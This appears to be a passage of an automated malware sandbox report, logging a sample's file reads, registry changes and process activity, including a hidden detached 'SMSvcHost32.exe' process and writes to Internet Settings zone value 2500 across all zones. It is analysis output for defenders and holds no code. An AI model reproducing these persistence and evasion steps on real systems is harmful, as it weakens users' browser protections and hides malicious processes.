| Get Info | C:\Users\Default User\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Default User\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Nd9E1FYi\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Public\AppData\Local\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | C:\Users\Public\Local Settings\Temp\uqjckeguhl.tmp | type = file_attributes |
|
11 | |
| Get Info | - | type = time |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | type = size |
|
1 | |
| Get Info | - | type = time |
|
1 | |
| Get Info | - | type = time |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 512, size_out = 512 |
|
249 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 251392, size_out = 251392 |
|
1 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 512, size_out = 512 |
|
249 | |
| Read | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe | size = 251392, size_out = 251392 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | size = 274 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | size = 328 |
|
1 | |
| Write | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.inf | size = 278 |
|
1 |
Registry (872)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | - |
|
2 | |
| Create Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
4 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
8 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | - |
|
55 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | - |
|
55 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | - |
|
55 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | - |
|
55 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | - |
|
54 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
5 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
3 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Hardware\DESCRIPTION\System\CentralProcessor\0 | value_name = ProcessorNameString, data = 73 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = SystemBiosVersion, data = 4411304, type = REG_MULTI_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System | value_name = VideoBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | value_name = SystemBiosVersion, data = 71, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = DigitalProductId, data = 164 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = InstallDate, data = 63 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyEnable, data = 0 |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
3 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
2 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyServer |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = ProxyOverride |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoConfigURL |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings | value_name = AutoDetect |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
5 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
4 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
4 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
4 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
4 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
4 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
8 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
8 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
8 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
8 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
8 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
55 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
55 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
55 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
55 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ | value_name = 2500, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
54 |
Process (22045)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Nd9E1FYi\AppData\Local\Temp\SMSvcHost32.exe --vwxyz | os_pid = 0xdd4, creation_flags = CREATE_DETACHED_PROCESS, CREATE_BREAKAWAY_FROM_JOB, CREATE_NO_WINDOW, show_window = SW_HIDE |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
396 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
378 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\develop-patent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\its.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\internet explorer\gently budapest.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\thoroughlypriestprefix.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft analysis services\inserted_field.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\semi bay.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows journal\outdoor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\wool-parish-horses.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\mozilla firefox\spoken-delayed.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\spokesman.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla maintenance service\oxide.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\off-covered-playlist.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\bryant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\uninstall information\postal-fool.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office 15\crm_remarks_ctrl.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\volunteer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\ranger_tu_community.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\eddie_cholesterol_reprint.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\bracket-natural-chancellor.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msecache\safari.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
123 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
53 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
486 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
| Open | c:\program files\windowsapps\microsoft.messaging_1.10.22012.0_x86__8wekyb3d8bbwe\skypehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
59 | |
